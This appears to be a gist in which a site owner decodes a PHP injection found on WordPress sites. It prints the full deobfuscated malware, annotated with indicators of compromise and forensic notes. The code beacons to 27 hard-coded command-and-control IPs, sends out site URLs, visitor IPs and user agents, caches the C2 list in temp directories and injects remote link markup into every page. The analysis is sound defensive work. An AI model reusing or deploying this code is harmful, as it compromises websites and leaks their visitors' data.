@gMagicScott
Last active January 1, 2016 06:49
Decoding PHP injection on WordPress files. **!! Do NOT run this code on your machine !!**
<?php
/**
 * The original sample wrapped everything below in two guard checks:
 * - run the injection only once per request
 * - run it only when the visitor is identified as a Google, MSN or Yahoo!
 *   crawler, so the injected links are seen by search engines but not by
 *   normal visitors or the site owner (a cloaking technique)
 *
 * Those checks were removed here to make the decoded code more readable;
 * as listed, the ob_start() at the bottom fires on every request.
 */
/**
 * Locate one writable directory the injector can use as scratch space.
 *
 * Probes, in this fixed order: sys_get_temp_dir(), the TMP / TMPDIR / TEMP
 * environment variables, the directory tempnam() actually writes to,
 * upload_tmp_dir, session.save_path and finally the directory holding this
 * infected file. The first writable candidate is returned. Every probe is
 * wrapped in `@`, so nothing reaches the error log while the search runs.
 *
 * Only my_callback() uses this, to park a temporary copy of a gzipped
 * output buffer.
 *
 * @return string|null Real path of the first writable candidate, or null
 *                     when none of them is writable
 */
function t_dir() {
    if ( function_exists( "sys_get_temp_dir" ) ) {
        if ( @is_writeable( sys_get_temp_dir() ) ) {
            return realpath(sys_get_temp_dir());
        }
    }
    // Environment-supplied locations ($_ENV is only populated when php.ini's
    // variables_order includes "E", so on many hosts these are all empty).
    if ( !empty( $_ENV["TMP"] ) && @is_writeable( realpath( $_ENV["TMP"] ) ) ) {
        return realpath( $_ENV["TMP"] );
    }
    if ( !empty( $_ENV["TMPDIR"] ) && @is_writeable( realpath( $_ENV["TMPDIR"] ) ) ) {
        return realpath( $_ENV["TMPDIR"] );
    }
    if ( !empty( $_ENV["TEMP"]) && @is_writeable( realpath( $_ENV["TEMP"] ) ) ) {
        return realpath( $_ENV["TEMP"] );
    }
    // tempnam() is handed __FILE__ -- a file, not a directory -- as $dir, so
    // the probe file lands wherever PHP falls back to (presumably the system
    // temp directory; see tempnam()'s fallback rules). The file is unlinked
    // at once; only its directory is of interest. Forensic side effect: a
    // short-lived, empty, randomly named file in that directory.
    $tempfile = @tempnam(__FILE__, "");
    if ( @file_exists($tempfile) ) {
        @unlink( $tempfile );
        if ( @is_writeable( realpath( dirname( $tempfile ) ) ) ) {
            return realpath( dirname( $tempfile ) );
        }
    }
    if ( @is_writeable( realpath( @ini_get( "upload_tmp_dir" ) ) ) ) {
        return realpath( @ini_get( "upload_tmp_dir" ) );
    }
    if ( @is_writeable( realpath( session_save_path() ) ) ) {
        return realpath( session_save_path() );
    }
    // Last resort: the directory containing the infected file itself.
    if ( @is_writeable( realpath( dirname( __FILE__ ) ) ) ) {
        return realpath( dirname( __FILE__ ) );
    }
    return null;
}
/**
 * Collect every writable scratch directory, not just the first one.
 *
 * Same probes as t_dir(), same order, but each hit is appended instead of
 * returned. get_know_ip() reads its cached C2 address list from all of these
 * directories and save_know_ip() writes it to all of them, which is what lets
 * the cache survive the cleaning of any single location. When hunting for
 * artefacts, check every directory this can return, not only /tmp.
 *
 * @return array Unique writable directories, in probe order. $res is never
 *               initialised, so if no probe succeeds array_unique() receives
 *               an undefined variable (a notice; a TypeError on PHP 8).
 */
function get_t_dir_mass() {
    if (function_exists("sys_get_temp_dir")) {
        if (@is_writeable(sys_get_temp_dir())) {
            $res[] = realpath(sys_get_temp_dir());
        }
    }
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) {
        $res[] = realpath($_ENV["TMP"]);
    }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) {
        $res[] = realpath($_ENV["TMPDIR"]);
    }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) {
        $res[] = realpath($_ENV["TEMP"]);
    }
    // Same tempnam(__FILE__) trick as in t_dir(): creates and immediately
    // removes a probe file just to learn which directory PHP falls back to.
    $tempfile = @tempnam(__FILE__, "");
    if (@file_exists($tempfile)) {
        @unlink($tempfile);
        if (@is_writeable(realpath(dirname($tempfile)))) {
            $res[] = realpath(dirname($tempfile));
        }
    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) {
        $res[] = realpath(@ini_get("upload_tmp_dir"));
    }
    if (@is_writeable(realpath(session_save_path()))) {
        $res[] = realpath(session_save_path());
    }
    // The infected file's own directory is always a candidate.
    if (@is_writeable(realpath(dirname(__FILE__)))) {
        $res[] = realpath(dirname(__FILE__));
    }
    return array_unique($res);
}
/**
 * Build the list of command-and-control hosts to try.
 *
 * The list is seeded with 27 hard-coded IPv4 addresses and extended with
 * whatever is stored, one address per line, in a cache file named
 * "N2W3Y0qaFA" in every writable directory returned by get_t_dir_mass().
 * That file is written by save_know_ip() from the C2's own replies, so the
 * operator can rotate infrastructure without touching the infected files.
 *
 * Indicators of compromise for this sample:
 *   - a file named N2W3Y0qaFA in any temp/upload/session directory
 *   - outbound HTTP from the web server to the addresses below
 * The addresses are from an old sample (this gist dates from 2013-2016);
 * treat them as historical indicators, not as currently malicious hosts.
 *
 * @return array Unique C2 addresses: hard-coded seeds first, cached ones after
 */
function get_know_ip()
{
    $know[] = "130.0.233.18";
    $know[] = "130.0.237.24";
    $know[] = "149.154.154.191";
    $know[] = "151.236.17.13";
    $know[] = "151.236.18.8";
    $know[] = "178.209.52.218";
    $know[] = "178.73.210.163";
    $know[] = "37.235.53.202";
    $know[] = "46.17.57.141";
    $know[] = "46.246.93.130";
    $know[] = "5.61.45.110";
    $know[] = "176.99.6.245";
    $know[] = "151.236.25.47";
    $know[] = "151.236.28.97";
    $know[] = "151.236.26.86";
    $know[] = "151.236.20.19";
    $know[] = "144.76.178.235";
    $know[] = "188.116.23.77";
    $know[] = "80.67.12.206";
    $know[] = "5.61.38.129";
    $know[] = "37.230.118.51";
    $know[] = "5.187.5.185";
    $know[] = "5.187.1.129";
    $know[] = "5.187.4.155";
    $know[] = "209.159.153.165";
    $know[] = "144.76.178.236";
    $know[] = "176.9.193.201";
    // Merge in the on-disk cache. Because the seeds above are compiled in,
    // deleting the cache file alone does not cut the sample off from its C2.
    foreach (get_t_dir_mass() as $t) {
        if (file_exists($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA")) {
            foreach (file($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA") as $tt) {
                $know[] = trim($tt);
            }
        }
    }
    return array_unique($know);
}
/**
 * Persist an updated C2 address list to every writable scratch directory.
 *
 * Called by my_samui_get_links() with the list the C2 sent back. The cache
 * file "N2W3Y0qaFA" is overwritten (mode "w") in each directory returned by
 * get_t_dir_mass(); the fopen() result is not checked, so an unwritable
 * directory just yields warnings rather than stopping the loop.
 *
 * @param array $ip Addresses to store, one per line (lines are written as
 *                  received; get_know_ip() trims them on read)
 * @return void
 */
function save_know_ip($ip)
{
    $content = implode(PHP_EOL, $ip);
    foreach (get_t_dir_mass() as $t) {
        $f = fopen($t . DIRECTORY_SEPARATOR . "N2W3Y0qaFA", "w");
        fputs($f, $content);
        fclose($f);
    }
}
/**
 * Guess the visitor's "real" IPv4 address from proxy headers, for the C2 beacon.
 *
 * Walks a list of forwarding headers and returns the first value that is a
 * plain dotted-quad IPv4 address (first octet 1-255, others 0-255, no
 * leading zeros in the first). Only if none matches does it fall back to
 * REMOTE_ADDR. Everything before that fallback is client-supplied, so the
 * address reported upstream is trivially spoofable; IPv6 never matches the
 * pattern and always ends in the REMOTE_ADDR fallback.
 *
 * Quirks worth knowing when reading logs of an infected host:
 *   - the `else` branch runs even when the header is not set, so every
 *     missing header produces an "undefined index" notice
 *   - stristr()'s arguments are reversed (haystack ",", needle = the header
 *     value), so the comma-separated-list branch only triggers for a value
 *     that is itself "," (or empty on PHP 8); effectively dead code
 *   - array_shift(explode(...)) passes a temporary by reference, which PHP
 *     reports as "Only variables should be passed by reference"
 *   - keys without the HTTP_ prefix (CLIENT_IP, VIA, ...) are not standard
 *     $_SERVER entries; presumably they only exist on some hosting stacks
 *
 * @return string The chosen IPv4 address, or $_SERVER["REMOTE_ADDR"]
 */
function my_get_real_ip()
{
    $proxy_headers = array(
        "CLIENT_IP",
        "FORWARDED",
        "FORWARDED_FOR",
        "FORWARDED_FOR_IP",
        "HTTP_CLIENT_IP",
        "HTTP_FORWARDED",
        "HTTP_FORWARDED_FOR",
        "HTTP_FORWARDED_FOR_IP",
        "HTTP_PC_REMOTE_ADDR",
        "HTTP_PROXY_CONNECTION",
        "HTTP_VIA",
        "HTTP_X_FORWARDED",
        "HTTP_X_FORWARDED_FOR",
        "HTTP_X_FORWARDED_FOR_IP",
        "HTTP_X_IMFORWARDS",
        "HTTP_XROXY_CONNECTION",
        "VIA",
        "X_FORWARDED",
        "X_FORWARDED_FOR"
    );
    foreach ($proxy_headers as $proxy_header) {
        // Whole header value is a single IPv4 address: accept it as-is.
        if (isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])) {
            return $_SERVER[$proxy_header];
        // Intended: "ip1, ip2, ..." lists -- take the first entry, strip a
        // ":port" suffix, validate. Never reached for real lists because the
        // stristr() arguments are swapped (see the docblock).
        } else if (stristr(",", $_SERVER[$proxy_header]) !== FALSE) {
            $proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header])));
            if (($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE)
                $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);
            if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp))
                return $proxy_header_temp;
        }
    }
    // Fallback: the address the web server actually talked to.
    return $_SERVER["REMOTE_ADDR"];
}
/**
 * Reconstruct the URL of the current page, minus its query string.
 *
 * The scheme is hard-coded to "http://" even for HTTPS requests, and
 * HTTP_HOST is whatever the client sent in its Host header. The result is
 * reported to the C2 in clear (not URL-encoded) by my_samui_get_links().
 *
 * @return string "http://" . HTTP_HOST . REQUEST_URI, truncated at the first "?"
 */
function my_get_url()
{
    $url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
    if (strpos($url, "?") !== false) {
        $url = substr($url, 0, strpos($url, "?"));
    }
    return $url;
}
/**
 * Fetch a page from a C2 host over plain HTTP, using whichever transport the
 * host permits.
 *
 * Tries, in order: cURL (3 s total timeout, the handle is never closed),
 * file_get_contents() when allow_url_fopen is on, and finally a raw socket
 * to port 80 speaking HTTP/1.0 (30 s connect timeout). The response body is
 * returned trimmed; HTTP headers are stripped only in the socket path. This
 * three-way fallback is why disabling cURL or allow_url_fopen alone does not
 * silence the beacon -- outbound port 80 has to be blocked.
 *
 * Note the URL is built as "http://" . $ip . "/" . $page while the caller's
 * $page already starts with "/", so cURL / fopen requests show up on the C2
 * side as "//slk.php?..."; the socket path sends "GET /slk.php?...".
 *
 * @param string $ip   C2 address (used verbatim as host)
 * @param string $page Path plus query string to request
 * @return string|null Trimmed body; "" when cURL fails (trim(false)); null with
 *                     a notice when the socket connect fails ($ult unset)
 */
function my_get_contents($ip, $page)
{
    if (function_exists("curl_init")) {
        $ch = curl_init("http://" . $ip . "/" . $page);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        $ult = trim(curl_exec($ch));
        return $ult;
    }
    if (ini_get("allow_url_fopen")) {
        $ult = trim(@file_get_contents("http://" . $ip . "/" . $page));
        return $ult;
    }
    // Last resort: hand-rolled HTTP/1.0 over a bare TCP socket.
    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET $page HTTP/1.0\r\n";
        $out .= "Host: $ip\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = "";
        while (!feof($fp)) {
            $ret .= fgets($fp, 128);
        }
        fclose($fp);
        // Drop everything up to and including the header/body separator.
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
    return $ult;
}
/**
 * Beacon to the C2 and fetch the HTML to inject into the page.
 *
 * Protocol, as implemented here:
 *   1. Request GET /slk.php?aid=1001&url=<page url>&ip=<visitor ip>
 *      &ua=<lowercased user agent>&cod=<md5(url . time())> from each known
 *      C2 host, in random order, until one answers.
 *      Only ua is URL-encoded; url, ip and cod go in raw.
 *   2. A valid reply contains md5($cod) -- a 32-character hex delimiter
 *      derived from the request, which is how the client recognises a
 *      genuine response.
 *   3. Text before the delimiter is a newline-separated updated host list
 *      and is persisted via save_know_ip(); text after it is the link
 *      markup that my_mod_con() splices into the page.
 *
 * What leaks to the operator on every beacon: site URL, visitor IP, user
 * agent, and a fixed identifier "1001" (aid -- presumably an account or
 * affiliate id, cannot be confirmed from this sample). The first $ua
 * assignment is dead; the second, URL-encoded one is what gets sent.
 *
 * @return string|null The markup to inject, or null if no C2 host produced a
 *                     reply containing the delimiter
 */
function my_samui_get_links()
{
    $all = get_know_ip();
    shuffle($all);
    $url = my_get_url();
    $real_ip = my_get_real_ip();
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    $aid = "1001";
    // $cod changes every second; $check is what the reply must echo back.
    $cod = md5($url . time());
    $check = md5($cod);
    $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
    $page = "/slk.php?aid=" . $aid . "&url=" . $url . "&ip=" . $real_ip . "&ua=" . $ua . "&cod=" . $cod;
    foreach ($all as $ip) {
        $tc = my_get_contents(trim($ip), $page);
        $pos = strpos($tc, $check);
        if ($pos !== false) {
            // Everything before the delimiter: fresh C2 list, cached to disk.
            $proxy_list = substr($tc, 0, $pos);
            save_know_ip(explode("\n", $proxy_list));
            // Everything after the 32-char delimiter: the HTML to inject.
            $links = substr($tc, $pos + 32);
            return $links;
        }
    }
}
/**
 * Splice the C2-supplied markup into the page right after its <body> tag.
 *
 * Only the first <body ...> is touched (limit 1). The cheap strpos() guard
 * is case-sensitive while the regex is not, so a page written as <BODY>
 * passes through untouched. The C2 beacon in my_samui_get_links() fires
 * whenever the guard passes, before the replacement happens.
 *
 * Note on the replacement string: "\1" inside a PHP double-quoted string is
 * the octal escape for byte 0x01, not a PCRE backreference. The original
 * tag's attributes are therefore dropped and the output becomes
 * "<body" . chr(1) . ">" followed by the injected links -- a stray control
 * byte that is a useful fingerprint of this sample in captured responses.
 * ('\1' or "$1" would have preserved the attributes.)
 *
 * @param string $con Page contents from the output buffer
 * @return string Modified contents, or $con unchanged if no "<body" is present
 */
function my_mod_con($con) {
    if ( strpos($con, "<body") !== false ) {
        $text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>" . my_samui_get_links(), $con, 1);
        return $text;
    } else {
        return $con;
    }
}
/**
 * Output-buffer callback: inject into the finished page, gzip-aware.
 *
 * If headers have already gone out and one of them is exactly
 * "Content-Encoding: gzip" (non-strict in_array(), exact string match -- a
 * differently spaced or cased header is not detected), the buffer is
 * assumed to be gzip data: it is written to a temp file in t_dir(),
 * decompressed through gzopen()/gzread() (at most 10,000,000 bytes),
 * modified, and re-compressed with gzencode(). Otherwise the buffer is
 * modified as plain text. No return value is checked anywhere; if t_dir()
 * yields null, tempnam() is handed null as its directory (presumably PHP's
 * system-temp fallback applies, with a deprecation on PHP 8.1+).
 *
 * Forensic note: the temp file is named FOO<random> and is unlinked right
 * after use, so its presence is brief.
 *
 * @param string $buf Contents of the output buffer
 * @return string Modified page contents, gzip-encoded when the input was
 */
function my_callback( $buf ) {
    if ( headers_sent() ) {
        if ( in_array( "Content-Encoding: gzip", headers_list() ) ) {
            // Round-trip through a file because gzread() needs a gz handle.
            $tmpfname = tempnam( t_dir(), "FOO" );
            $zf = fopen( $tmpfname, "w" );
            fputs( $zf, $buf );
            fclose( $zf );
            $zd = gzopen( $tmpfname, "r" );
            $contents = gzread( $zd, 10000000 );
            $contents = my_mod_con( $contents );
            gzclose( $zd );
            unlink( $tmpfname );
            $contents = gzencode( $contents );
        } else {
            $contents = my_mod_con( $buf );
        }
    } else {
        $contents = my_mod_con( $buf );
    }
    return ( $contents );
}
/**
 * Entry point: register my_callback() on an output buffer so every response
 * produced after this point is rewritten before it leaves PHP.
 *
 * In the original sample this line sat behind the "run once" and
 * "search-engine crawler only" checks described at the top of the file;
 * with those stripped, the injection (and the C2 beacon) runs on every
 * request that reaches the infected file.
 */
ob_start("my_callback");

I'll stop there. I tried to make one commit per layer of `eval( base64_decode( ... ) )` obfuscation, but I'm pretty sure I missed a few.

What kills me is that I went through every file and the server logs trying to find how it got in, but I may very well have missed the security hole. I filtered through 28 WordPress installs on a single shared hosting account. (With that many installs under one account, typically all writable by the same system user, one outdated plugin or theme on any of them is enough — the entry point need not be in the site where the injection was found.)

Bah!
